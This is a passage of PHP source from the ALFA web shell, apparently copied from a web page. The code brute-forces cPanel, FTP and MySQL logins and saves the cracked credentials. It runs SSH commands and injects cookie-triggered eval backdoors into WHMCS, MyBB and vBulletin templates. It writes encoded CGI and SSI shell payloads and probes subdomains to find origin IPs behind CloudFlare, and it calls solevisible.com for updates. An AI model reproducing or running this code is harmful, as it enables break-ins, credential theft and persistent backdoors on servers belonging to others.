echo ‘UserName: <font color=”red”>’.$info['username'].’</font> PassWord: <font color=”red”>’.$info['password'].’</font><font color=”green”>  Login Success….</font><br>’;
$info['target'] = $url;
CrackerResualt($info);
}
curl_close($curl);
}
function Alfa_Mysql_Cracker($info){
if(@mysqli_connect($info['target'].’:’.$info['port'],$info['username'],$info['password'])){
CrackerResualt($info);
echo ‘UserName: <font color=”red”>’.$info['username'].’</font> PassWord: <font color=”red”>’.$info['password'].’</font><font color=”green”>  Login Success….</font><br>’;
}
}
function Alfa_FTPC($info){
if($con=@ftp_connect($info['target'],$info['port'])){
if($con){
$login=@ftp_login($con,$info['username'],$info['password']);
if($login){CrackerResualt($info);}}}
@ftp_close($con);
}
function CrackerResualt($info){
$res = $info['target'].’ => ‘.$info['username'].”:”.$info['password'].”\n” ;
$c = @fopen($info['fcrack'],’a+’);
@fwrite($c, $res);
@fclose($c);
}
function Alfa_Call_Function_Cracker($method,$info){
switch($method){case ‘cp’:return Alfa_CP_Cracker($info);break;case ‘direct’: case ‘phpmyadmin’:return Alfa_DirectAdmin_Cracker($info);break;case ‘ftp’:return Alfa_FTP_Cracker($info);break;case ‘mysql’:return Alfa_Mysql_Cracker($info);break;case ‘mysql’:return Alfa_FTPC($info);break;}
}
function alfaCrackers(){
alfahead();
AlfaNum(9,10);
echo ‘<div class=”header”><center><br><div class=”txtfont_header”>| Brute Forcer |</div><br><br><form method=”post” onsubmit=”g(\’Crackers\’,null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\’start\’,this.protocol.value,this.loginpanel.value);return false;”><div class=”txtfont”>Login Page: <select onclick=”dis_input(this.value);” name=”loginpanel”>’;
foreach(array(‘cp’=>’Cpanel’,’direct’=>’DirectAdmin’,’ftp’=>’FTP’,’phpmyadmin’=>’PhpMyAdmin[DirectAdmin]‘,’mysql’=>’mysql_connect()’,’ftpc’=>’ftp_connect()’) as $key=>$val)echo(‘<option value=”‘.$key.’”>’.$val.’</option>’);
echo ‘</select> Protocol: <select id=”protocol” name=”protocol”>’;
foreach(array(‘https://’,’http://’,’ftp://’) as $val)echo(‘<option value=”‘.$val.’”>’.$val.’</option>’);
echo ‘</select> Website/ip Address: <input id=”target” type=”text” name=”target” value=”localhost”>
Port: <input id=”port” type=”text” name=”port” value=”2083″>
<table width=”30%”><td align=”center”>Users List</td><td align=”center”>Passwords</td></table>
<textarea placeholder=”Users” rows=”20″ cols=”25″ name=”usernames”>’.($GLOBALS['sys']==’unix’?alfaEx(“cut -d: -f1 /etc/passwd”):””).’</textarea>
&nbsp <textarea placeholder=”Passwords” rows=”20″ cols=”25″ name=”passwords”></textarea><br><br>
Save Result Into File <input type=”text” name=”fcrack” value=”cracked.txt”>
<p><input type=”submit” name=”cracking” value=” ” /></div></form></p><center>’;
$target = str_replace(array(‘https://’,’http://’,’ftp://’),”,$_POST['alfa1']);
$port = $_POST['alfa2'];
$usernames= $_POST['alfa3'];
$passwords = $_POST['alfa4'];
$fcrack = $_POST['alfa5'];
$cracking = $_POST['alfa6'];
$protocol = $_POST['alfa7'];
$loginpanel = $_POST['alfa8'];
$p = $loginpanel == ‘phpmyadmin’ ? $p = true : false;
if($cracking==’start’){
echo __pre();
$exuser = explode(“\n”,$usernames);
$expw = explode(“\n”,$passwords);
foreach($exuser as $user){
foreach($expw as $pw){
$array = array(‘username’ => trim($user),’password’ => trim($pw),’port’ => trim($port),’target’ => trim($target),’protocol’ => trim($protocol),’fcrack’ => trim($fcrack),’mysql’ => $p);
Alfa_Call_Function_Cracker($loginpanel,$array);
}
}
echo ‘<br><font color=”red”>Attack Finished…</font>’;
}
echo ‘</div>’;
alfafooter();
}
function alfassh2(){
if(function_exists(‘ssh2_connect’)){
$_SESSION['connected']= false;
$ssh_ip = $_POST['alfa1'];
$ssh_login = $_POST['alfa2'];
$ssh_pass = $_POST['alfa3'];
$ssh_port = $_POST['alfa4'];
$ssh_command = $_POST['alfa5'];
if($alfaconnect2ssh=@ssh2_connect($ssh_ip, $ssh_port))
{
if($alfalogin=@ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass))
{
$_SESSION['connected']= true;
}
}
if($_SESSION['connected']!== true){
alfahead();
echo “<div class=header>”;
echo “<form name=’ssh2′ method=’post’ onsubmit=’g(\”ssh2\”,null,this.ssh_ip.value,this.ssh_login.value,this.ssh_pass.value,this.ssh_port.value); return false;’><table cellpadding=’2′ cellspacing=’0′><tr><td><font color=\”#ffffff\”><b>IP</b></font></td><td><font color=\”#ffffff\”><b>SSH USER</b></font></td><td><font color=\”#ffffff\”><b>SSH PASS</b></font></td><td><font color=\”#ffffff\”><b>SSH PORT</b></font></td><td></td></tr><tr><td><input type=text name=ssh_ip value=”></td><td><input type=text name=ssh_login value=”></td><td><input type=text name=ssh_pass value=”></td><td><input type=text name=ssh_port value=”></td><td><input type=’submit’ name=’submit’ value=’ ‘></td></table></form></div>”;
alfafooter();
}
if($_SESSION['connected']==true){
alfahead();
echo “<div class=header>”;
echo “<form name=’ssh2′ method=’post’ onsubmit=’g(\”ssh2\”,null,\””.$ssh_ip.”\”,\””.$ssh_login.”\”,\””.$ssh_pass.”\”,\””.$ssh_port.”\”,this.ssh_command.value,\”>>\”); return false;’><table cellpadding=’2′ cellspacing=’0′><tr><td><input type=text name=ssh_command value=”></td><td><input type=’submit’ name=’execute’ value=’ ‘></td></table></form><form name=’ssh2′ method=’post’ onsubmit=’g(\’ssh2\’,null,\’\’,\’\’,\’\’); return false;’><input type=submit name=’destsession’ value=’logout’></form>”;
$alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command);
stream_set_blocking($alfastream,true);
$output = ssh2_fetch_stream($alfastream,SSH2_STREAM_STDIO);
if($_POST['alfa6']==’>>’){
echo ‘<pre class=ml1>’;
ob_start();
echo  stream_get_contents($output);
echo htmlspecialchars(ob_get_clean());
}
echo “</div>”;
alfafooter();
}}else{
alfahead();
echo ‘<div class=header><p><center><b><font color=”red”>Server does not support SSH2</font><p></b></center></div>’;
alfafooter();
}
}
function output($string){ echo “<br><pre id=\”strOutput\” style=\”margin-top:5px\” class=\”ml1\”><br><center><font color=red><a target=’_blank’ href=’”.$string.”‘>Click Here !</a></font></b></center><br><br>”;}
function alfaShellInjectors(){
alfahead();
echo ‘<div class=header>’;
AlfaNum(11);
echo ‘<center><p><div class=”txtfont_header”>| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick=”g(\’ShellInjectors\’,null,\’whmcs\’,null)”>| WHMCS | </a><a href=javascript:void(0) onclick=”g(\’ShellInjectors\’,null,null,\’mybb\’)”>| MyBB | </a><a href=javascript:void(0) onclick=”g(\’ShellInjectors\’,null,null,null,\’vb\’)”>| vBulletin |</a></h3></center>’;
$selector = ‘<p><div class=”txtfont”>Shell Inject Method : </div> <select name=”method” style=”width:100px;”><option value=”auto”>AutoMatic</option><option value=”man”>Manuel</option></select></p>’;
if(isset($_POST['alfa1']) && $_POST['alfa1']== ‘whmcs’){
AlfaNum();
echo __pre().”<p><div class=’txtfont_header’>| WHMCS |</div></p><center><center><p>”.getConfigHtml(‘whmcs’).”</p><form onSubmit=\”g(‘ShellInjectors’,null,’whmcs’,null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\” method=’post’>”;
$table = array(‘td1′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Path WHMCS Url : ‘, ‘inputName’ => ‘path’, ‘inputValue’ => ‘http://site.com/whmcs’, ‘inputSize’ => ’50′),
‘td2′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Mysql Host : ‘, ‘inputName’ => ‘dbh’, ‘id’ => ‘db_host’, ‘inputValue’ => ‘localhost’, ‘inputSize’ => ’50′),
‘td3′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Name : ‘, ‘inputName’ => ‘dbn’, ‘id’ => ‘db_name’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td4′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db User : ‘, ‘inputName’ => ‘dbu’, ‘id’ => ‘db_user’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td5′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Pass : ‘, ‘inputName’ => ‘dbp’, ‘id’ => ‘db_pw’, ‘inputValue’ => ”, ‘inputSize’ => ’50′)
);
create_table($table);
echo $selector;
echo “<p><input type=’submit’ value=’ ‘></p></form></center></td></tr></table></center>”;
if(isset($_POST['alfa6'])) {
$dbu = $_POST['alfa6'];
$dbn = $_POST['alfa7'];
$dbp = $_POST['alfa8'];
$dbh = $_POST['alfa9'];
$path = $_POST['alfa10'];
$method = $_POST['alfa4'];
$index = “{php}”.ALFA_UPLOADER.”;{/php}”;
$newin = str_replace(“‘”,”\’”,$index);
$newindex = “<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\”{\$pw_reset_url}\”>{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \”123\”){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\”!\”);}{\/php}”;
if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){
if(filter_var($path,FILTER_VALIDATE_URL)){
$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
$soleSave= mysqli_query($conn,”select message from tblemailtemplates where name=’Password Reset Validation’”);
$soleGet = mysqli_fetch_assoc($soleSave);
$tempSave1 = $soleGet['message'];
$tempSave = str_replace(“‘”,”\’”,$tempSave1);
$inject = “UPDATE tblemailtemplates SET message=’$newindex’ WHERE name=’Password Reset Validation’”;
$result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
$create = “insert into tblclients (email) values(‘solevisible@fbi.gov’)”;
$result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
if(function_exists(‘curl_version’) && $method == ‘auto’){
$AlfaSole = new AlfaCURL(true);
$saveurl = $AlfaSole->Send($path.”/pwreset.php”);
$getToken = preg_match(“/name=\”token\” value=\”(.*?)\”/i”,$saveurl,$token);
$AlfaSole->Send($path.”/pwreset.php”,”post”,”token={$token[1]}&action=reset&email=solevisible@fbi.gov”);
$backdata = “UPDATE tblemailtemplates SET message=’{$tempSave}’ WHERE name=’Password Reset Validation’”;
$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
__alert(“shell injectet…”);
$ff= ‘http://’.$path.”/solevisible.php”;
output($ff);}else{
echo “<br><pre id=\”strOutput\” style=\”margin-top:5px\” class=\”ml1\”><br><center><b><font color=\”#FFFFFF\”>Please go to Target => </font><a href=’”.$path.”/pwreset.php’ target=’_blank’>”.$path.”/pwreset.php</a><br/><font color=’#FFFFFF’> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=’#FFFFFF’>And Go To => </font><a href=’”.$path.”/solevisible.php’ target=’_blank’>”.$path.”/solevisible.php</a></b></center><br><br>”;}}else{__alert(‘Path is not Valid…’);}}}
}if(isset($_POST['alfa2']) && $_POST['alfa2']== ‘mybb’){
AlfaNum(1,2,3,5);
echo __pre().”<p><div class=’txtfont_header’>| MyBB |</div></p><center><center>”.getConfigHtml(“mybb”).”<form id=’sendajax’ onSubmit=\”g(‘ShellInjectors’,null,null,’mybb’,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\” method=POST>
“;
$table = array(‘td1′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Host : ‘, ‘inputName’ => ‘dbh’, ‘id’=>’db_host’,’inputValue’ => ‘localhost’, ‘inputSize’ => ’50′),
‘td2′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘DataBase Name : ‘, ‘inputName’ => ‘dbn’, ‘id’=>’db_name’ ,’inputValue’ => ”, ‘inputSize’ => ’50′),
‘td3′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘User Name : ‘, ‘inputName’ => ‘dbu’, ‘id’=>’db_user’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td4′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Password : ‘, ‘inputName’ => ‘dbp’, ‘id’=>’db_pw’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td5′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Table Prefix : ‘, ‘inputName’ => ‘prefix’, ‘id’=>’db_prefix’,’inputValue’ => ‘mybb_’, ‘inputSize’ => ’50′)
);
create_table($table);
echo $selector;
echo “<p><input type=submit value=’ ‘></p></form></center></center>”;
if(isset($_POST['alfa6'])) {
$dbu = $_POST['alfa6'];
$dbn = $_POST['alfa7'];
$dbp = $_POST['alfa8'];
$dbh = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$method = $_POST['alfa4'];
$shellCode = “{\${“.ALFA_UPLOADER.”}}”;
$newinshell = str_replace(“‘”,”\’”,$shellCode);
if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){
$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
$inject = “select template from {$prefix}templates where  title= ‘calendar’”;
$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));
$GetTemp = mysqli_fetch_assoc($result);
$saveDate = $GetTemp['template'];
$repsave = str_replace($shellCode,””,$saveDate);
$repsave = str_replace(“‘”,”\’”,$repsave);
$createShell = “update {$prefix}templates SET template= ‘”.$newinshell.$repsave.”‘ where title = ‘calendar’”;
$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));
$geturl = “select value from {$prefix}settings where name= ‘bburl’”;
$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));
$rowb = mysqli_fetch_assoc($findurl);
$furl = $rowb['value'];
$realurl = parse_url($furl,PHP_URL_HOST);
$realpath = parse_url($furl,PHP_URL_PATH);
$res = false;
$AlfaCurl = new AlfaCURL();
if (extension_loaded(‘sockets’) && function_exists(‘fsockopen’) && $method == ‘auto’ ){
if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
@fputs($fsock, “GET $realpath/calendar.php HTTP/1.1\r\n”);
@fputs($fsock, “HOST: $realurl\r\n”);
@fputs($fsock, “Connection: close\r\n\r\n”);
$check = fgets($fsock);
if(preg_match(“/200 OK/i”,$check)){
$repairdbtemp = “update {$prefix}templates SET template= ‘$repsave’ where title = ‘calendar’”;
$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}
@fclose($fsock);}}elseif(function_exists(‘curl_version’) && $method == ‘auto’){
$AlfaCurl->Send($realurl.$realpath.”/calendar.php”);
$res = true;
}
if($res){
$ff = ‘http://’.$realurl.$realpath.”/solevisible.php”;
output($ff);
}else{
$ff = ‘http://’.$realurl.$realpath.”/calendar.php”;
$fff = ‘http://’.$realurl.$realpath.”/solevisible.php”;
echo “<br><pre id=’strOutput’ style=’margin-top:5px’ class=’ml1′><br><center><b><font color=’#FFFFFF’>Please Go To Target => </font><a href=’”.$ff.”‘ target=’_blank’>”.$ff.”</a><br/><font color=’#FFFFFF’>And Go To => </font><a href=’”.$fff.”‘ target=’_blank’>”.$fff.”</a></b></center><br><br>”;
}}}}
if(isset($_POST['alfa3']) && $_POST['alfa3']== ‘vb’){
AlfaNum(1,2,7,9,10);
echo __pre().’<p><div class=”txtfont_header”>| vbulletin |</div></p><p>’.getConfigHtml(‘vb’).’</p><form name=”frm” method=”POST” onsubmit=”g(\’ShellInjectors\’,null,null,this.lo.value,\’vb\’,this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;”>’;
$table = array(‘td1′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Host : ‘, ‘inputName’ => ‘lo’, ‘id’=>’db_host’,’inputValue’ => ‘localhost’, ‘inputSize’ => ’50′),
‘td2′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘DataBase Name : ‘, ‘inputName’ => ‘db’, ‘id’=>’db_name’,’inputValue’ => ”, ‘inputSize’ => ’50′),
‘td3′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘User Name : ‘, ‘inputName’ => ‘user’, ‘id’=>’db_user’,’inputValue’ => ”, ‘inputSize’ => ’50′),
‘td4′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Password : ‘, ‘inputName’ => ‘pass’, ‘id’=>’db_pw’,’inputValue’ => ”, ‘inputSize’ => ’50′),
‘td5′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Table Prefix : ‘, ‘inputName’ => ‘tab’, ‘id’=>’db_prefix’,’inputValue’ => ”, ‘inputSize’ => ’50′)
);
create_table($table);
echo $selector;
echo ‘<p><input type=”submit” value=” ” /></p></form></center>’;
if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){
$method = $_POST['alfa8'];
$code = “{\${“.ALFA_UPLOADER.”}}{\${exit()}}&”;
$conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_error($conn));
$rec = “select `template` from “.$_POST['alfa6'].”template WHERE title =’faq’”;
$recivedata = @mysqli_query($conn,$rec);
$getd = @mysqli_fetch_assoc($recivedata);
$savetoass = $getd['template'];
$code = str_replace(“‘”,”\’”,$code);
$p = “UPDATE “.$_POST['alfa6'].”template SET `template`=’”.$code.”‘ WHERE `title`=’faq’”;
$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));
$geturl = @mysqli_query($conn,”select `value` from “.$_POST['alfa6'].”setting WHERE `varname`=’bburl’”);
$getval = @mysqli_fetch_assoc($geturl);
$saveval = $getval['value'];
$realurl = parse_url($saveval,PHP_URL_HOST);
$realpath = parse_url($saveval,PHP_URL_PATH);
$res = false;
$AlfaCurl = new AlfaCURL();
if(extension_loaded(‘sockets’) && function_exists(‘fsockopen’) && $method == ‘auto’){
if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
@fputs($fsock, “GET $realpath/faq.php HTTP/1.1\r\n”);
@fputs($fsock, “HOST: $realurl\r\n”);
@fputs($fsock, “Connection: close\r\n\r\n”);
$check = fgets($fsock);
if(preg_match(“/200 OK/i”,$check)){
$p1 = “UPDATE “.$_POST['alfa6'].”template SET template =’”.str_replace(“‘”,”\’”,$savetoass).”‘ WHERE title =’faq’”;
$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
$res = true;
}
@fclose($fsock);
}
}elseif(function_exists(‘curl_version’) && $method == ‘auto’){
$AlfaCurl->Send($realurl.$realpath.”/faq.php”);
$p1 = “UPDATE “.$_POST['alfa6'].”template SET template =’”.str_replace(“‘”,”\’”,$savetoass).”‘ WHERE title =’faq’”;
$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
$res = true;
}
if($res){
$ff = ‘http://’.$realurl.$realpath.”/solevisible.php”;
output($ff);
}else{
$ff = ‘http://’.$realurl.$realpath.”/faq.php”;
$fff = ‘http://’.$realurl.$realpath.”/solevisible.php”;
echo “<center><p><font color=\”#FFFFFF\”>First Open This Link => </font><a href=’”.$ff.”‘ target=’_blank’>”.$ff.”</a><br/><font color=\”#FFFFFF\”>Second Open This Link => </font><a href=’”.$fff.”‘ target=’_blank’>”.$fff.”</a></center></p>”;}}}
echo ‘</div>’;
alfafooter();
}
function alfaupdatepath(){
if($_POST['path']!=”){
$_SESSION[__LAST_CWD__] = $_POST['path'];
}
echo($_SESSION[__LAST_CWD__]);
}
function alfacheckfiletype(){
$path = $_POST['path'];
$arg = $_POST['arg'];
if(@is_file($path.’/’.$arg)){
echo(“file”);
}else{
echo(“dir”);
}
}
function alfacheckupdate(){
if(!isset($_COOKIE['alfa_checkupdate'])){
if(function_exists(“curl_version”)){
$update = new AlfaCURL();
$json = $update->Send(“http://solevisible.com/update.json”);
$json = @json_decode($json);
if($json){
if(__ALFA_VERSION__ != $json->version){
@setcookie(“alfa_checkupdate”, “1″, time()+86400);
echo(‘<div class=”update-holder”><div class=”update-partner”><div class=”update-content”><div onClick=”document.getElementsByClassName(\’update-holder\’)[0].style.display = \’none\’;” class=”update-close”>X</div><a href=”‘.$json->url.’” target=”_blank”>’.$json->text.’<br> Version: ‘.$json->version.’</a></div></div></div>’);
}
}
}
}
}
function alfaWriteTocgiapi($name, $source){
@chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
@mkdir(‘alfacgiapi’,0755);
__write_file(“alfacgiapi/”.$name, __get_resource($source));
@chmod(“alfacgiapi/”.$name, 0755);
}
function alfacheckcgi(){if(strlen(alfaEx(“id”,false,true,true))>0)echo(“ok”);else echo(“no”);}
function alfaupdateheader(){
if(!isset($_SESSION["updateheader_data"])){
$bash = “zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==”;
$realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
alfaWriteTocgiapi(“getheader.alfa”,$bash);
$data = alfaEx(“cd ‘{$realdir}/alfacgiapi’;sh getheader.alfa”,false,true,true);
if(@is_array(@json_decode($data,true))){
$_SESSION["updateheader_data"] = $data;
echo $data;
}
}else{
echo $_SESSION["updateheader_data"];
}
}
function alfassiShell(){
alfahead();
echo ‘<div class=header>’;
@mkdir(‘alfa_shtml’,0755);
@chdir(‘alfa_shtml’);
alfacgihtaccess(‘shtml’);
$code = ‘rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==’;
@__write_file(‘alfa_ssi.shtml’,__get_resource($code));
@chmod(“alfa_ssi.shtml”,0755);
echo AlfaiFrameCreator(‘alfa_shtml/alfa_ssi.shtml’);
echo ‘</div>’;
alfafooter();
}
function alfacloudflare(){
alfahead();
AlfaNum(8,9,10,7,6,5,4,3);
echo “<div class=header><center><br><div class=’txtfont_header’>| Cloud Flare ByPasser |</div><br><form action=” onsubmit=\”g(‘cloudflare’,null,this.url.value,’>>’); return false;\” method=’post’>
<p><div class=’txtfont’>Target:</div> <input type=’text’ size=30 name=’url’ style=’text-align:center;’ placeholder=\”target.com\”> <input type=’submit’ name=’go’ value=’ ‘ /></p></form></center>”;
if($_POST['alfa2'] && $_POST['alfa2'] == ‘>>’){
$url = $_POST['alfa1'];
if(!preg_match(‘/^(https?):\/\/(w{3}|w3)\./i’, $url)){
$url = preg_replace(‘/^(https?):\/\//’, ”, $url);
$url = “http://www.”.$url;
}
$headers = @get_headers($url, 1);
$server = $headers['Server'];
$subs = array(‘owa.’,’2tty.’,’m.’,’gw.’,’mx1.’,’store.’,’1′,’2′,’vb.’,’news.’,’download.’,’video’,’cpanel.’, ‘ftp.’, ‘server1.’, ‘cdn.’, ‘cdn2.’, ‘ns.’, ‘ns3.’, ‘mail.’, ‘webmail.’, ‘direct.’, ‘direct-connect.’, ‘record.’, ‘ssl.’, ‘dns.’, ‘help.’, ‘blog.’, ‘irc.’, ‘forum.’, ‘dl.’, ‘my.’, ‘cp.’, ‘portal.’, ‘kb.’, ‘support.’,’search.’, ‘docs.’, ‘files.’, ‘accounts.’, ‘secure.’, ‘register.’, ‘apps.’, ‘beta.’, ‘demo.’, ‘smtp.’, ‘ns2.’, ‘ns1.’, ‘server.’, ‘shop.’, ‘host.’, ‘web.’, ‘cloud.’, ‘api.’, ‘exchange.’, ‘app.’, ‘vps.’, ‘owa.’, ‘sat.’, ‘bbs.’, ‘movie.’, ‘music.’, ‘art.’, ‘fusion.’, ‘maps.’, ‘forums.’, ‘acc.’, ‘cc.’, ‘dev.’, ‘ww42.’, ‘wiki.’, ‘clients.’, ‘client.’,’books.’,’answers.’,’service.’,’groups.’,’images.’,’upload.’,’up.’,’tube.’,’users.’,’admin.’,’administrator.’,’private.’,’design.’,’whmcs.’,’wp.’,’wordpress.’,’joomla.’,’vbulletin.’,’test.’,’developer.’,’panel.’,’contact.’);
if(preg_match(‘/^(https?):\/\/(w{3}|w3)\./i’, $url, $matches)){
if($matches[2] != ‘www’){$url = preg_replace(‘/^(https?):\/\//’, ”, $url);}else{
$url = explode($matches[0], $url);
$url = $url[1];}}
if(is_array($server))$server = $server[0];
echo __pre();
if(preg_match(‘/cloudflare/i’, $server))
echo “\n[+] CloudFlare detected: {$server}\n<br>”;
else
echo “\n[+] CloudFlare wasn’t detected, proceeding anyway.\n”;
echo ‘[+] CloudFlare IP: ‘ . is_ipv4(gethostbyname($url)) . “\n\n<br><br>”;
echo “[+] Searching for more IP addresses.\n\n<br><br>”;
for($x=0;$x<count($subs);$x++){
$site = $subs[$x] . $url;
$ip = is_ipv4(gethostbyname($site));
if($ip == ‘(Null)’)
continue;
echo “Trying {$site}: {$ip}\n<br>”;
}
echo “\n[+] Finished.\n<br>”;
}
echo ‘</div>’;
alfafooter();
}
function is_ipv4($ip){
return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : ‘(Null)’;
}
function __alert($s){
echo ‘<center>’.__pre().$s.’</center>’;
}
function create_table($data){
echo ‘<table border=”1″>’;
foreach ($data as $key => $val){
$array = array();
foreach($val as $k => $v){
$array[$k] = $v;
}
echo “<tr><td><div class=’tbltxt’>”.$array['tdName'].”</div></td><td><input type=’text’ id=’”.$array['id'].”‘ name=’”.$array['inputName'].”‘ “.($array['placeholder']?’placeholder’:’value’).”=’”.$array['inputValue'].”‘ size=’”.$array['inputSize'].”‘ “.($array['disabled']?’disabled’:”).”></td></tr>”;
}
echo ‘</table>’;
}
function alfaphp2xml(){
alfahead();
AlfaNum(8,9,10,7,6,5,4,3);
